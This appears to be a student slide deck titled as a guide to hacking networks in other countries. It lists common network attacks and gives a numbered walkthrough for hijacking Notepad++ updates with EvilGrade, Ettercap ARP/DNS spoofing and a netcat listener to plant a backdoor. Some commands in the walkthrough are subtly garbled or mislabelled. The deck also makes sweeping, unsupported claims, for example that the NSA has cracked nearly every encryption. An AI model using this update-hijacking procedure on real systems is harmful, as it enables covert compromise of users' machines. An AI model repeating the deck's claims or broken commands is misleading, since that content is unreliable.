How to hack networks in other countires 


By: Ari Mileikowsky

Common types of Network Attacks:



  • IP Spoofing
  • Access through source routing
  • Man in the middle attack (MitM)
  • Server Spoofing
  • DNS poisoning
  • DOS  or DDOS
  • Brute-force a port on the IP

Terminology:

  1. Brute-forcing - Trying every possible key. Using a program such as Cain or air-crack to test all possible combinations of characters in a pre-defined set against the encrypted password.
  2. Dictionary attack - Using a list of possible passwords usually from website leaks such as RockYou and Adobe. Tests passwords that were used on the site.
  3. Metasploit - Cybersecurity exploitation framework
  4. Meterpreter - An add-on to Metasploit
  5. SSL- Secure Socket Layer

 The NSA

The NSA has cracked nearly every known encryption and continues to invest and buy cracks into new ones. Routers and Switches are the NSA’s preferred devices to exploit however, as they transmit all the data sent by a group of computers instead of having to hack each computer individually. These layer two and three devices are also easier to crack due to infrequent updates and because they do not have intrusion detection software. The NSA builds much of their own software such as TURMOIL to do specific tasks when hacked into a network.
 

Hijacking software updates to install a rootkit for backdoor DNS Spoofing access notepad demo:

o   Install or have installed the software crack-able

  o   Download and install EvilGrade/Backtrack/Kali (payload modules may be in a different directory)

§  Make a root directory called EvilGrade (mkdir –p/root/evilgrade)

§  Change to that directory (cd /root/evilgrade)

§  Extract and install EvilGrade (tar –xvf isr-evilgrade-2.0.0.tar.gz)

Continued:

o   Run EvilGrade

§  ./evilgrade

o   List Modules

§  Show modules

o   Configure Notepad

§  Evilgrade>configure notepadplus

o   See what parameters the program (Notepad++) module Requires

§  Show options


Continued:

o   Start Evilgrade

§  Evilgrade>start

o   Add Notepad++ Update Server as the Domain to Steal

§  Notepad-plus.sourceforge.net A 192.168.1.104

o   Configure Iptables

§  Kwrite /etc/etter.conf

o   Start Ettercap

§  Ettercap –Tqi eth0 –P dns_spoof –M arp 192.168.1.114 192.168.1.104

fINALLY:

o   Start Netcat Listener

§  Nc –l –p 1234 (The port is the one defined by the evilgrade app -1234 for Notepad++)

o   Open Notepad++

o   Verify the DNS Spoof


- About 15 steps

DOS OR DDOS Attack


The most common example of a DDoS attack could be sending tons of URL requests to a website or a webpage in a very small amount of time.  This causes bottlenecking at the server side because the CPU just runs out of resources. SYN overload.


DNS Cache Poisoning or DNS Spoofing:

DNS Poisoning does not involve a direct attack on the servers of the targets, rather it relies on the weaknesses within the Domain Name System to replace valid DNS entries with those that cause web users to be connected to the hackers servers.

Man in the middle attack (Mitm)


The hacker puts him or herself in a communication session between people or systems through this attack. The hacker then appears to be the counterpart to each computer, and network traffic flows through the hacker's system. 

Gained:
-Eavesdropping
-Exploit information
-Change  sent data

Can be prevented with SSL

Hack an ip address with brute force:


Conclusion:


Hacking has done nearly 400 billion dollars in damage to the global economy. However, hacking is beneficial to surveilance. 
As we move even more of our lives to technology such as self driving cars, and new methods for hacking become available, how will that play out?
Made with Slides.com